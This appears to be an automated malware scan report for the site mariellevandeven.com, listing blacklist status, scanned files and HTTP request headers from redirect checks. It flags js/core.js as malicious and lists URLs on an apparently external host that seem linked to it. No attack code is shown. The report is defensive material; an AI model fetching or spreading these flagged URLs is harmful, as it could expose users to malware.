Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=mariellevandeven.com
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://mariellevandeven.com/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://mariellevandeven.com/ | 200 OK Content-Length: 10292 Content-Type: text/html | clean |
http://mariellevandeven.com/js/jquery-1.5.min.js | 200 OK Content-Length: 84362 Content-Type: application/javascript | clean |
http://mariellevandeven.com/js/jquery.address-1.3.2.min.js | 200 OK Content-Length: 11490 Content-Type: application/javascript | clean |
http://mariellevandeven.com/js/core.js | 404 Not Found Content-Length: 69941 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below)
Antivirus reports:
http://sexpot.co.kr/logs/info.php | 500 Can't connect to sexpot.co.kr:80 Content-Length: 187 Content-Type: text/plain | clean |
http://sexpot.co.kr/test404page.js | 500 Can't connect to sexpot.co.kr:80 Content-Length: 187 Content-Type: text/plain | clean |
http://mariellevandeven.com/js/jquery.galleriffic.js | 200 OK Content-Length: 33099 Content-Type: application/javascript | clean |
http://mariellevandeven.com/js/jquery.opacityrollover.js | 200 OK Content-Length: 937 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: mariellevandeven.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 22 Dec 2014 21:38:56 GMT
Accept-Ranges: bytes
ETag: "62dfc-2834-4c9e6e2c401c0"
Server: Apache/2
Vary: Accept-Encoding,User-Agent
Content-Length: 10292
Content-Type: text/html
Last-Modified: Mon, 17 Sep 2012 14:49:51 GMT
...10292 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: mariellevandeven.com
Referer: http://www.google.com/search?q=mariellevandeven.com
Result:
The result is similar to the first query. There are no suspicious redirects found.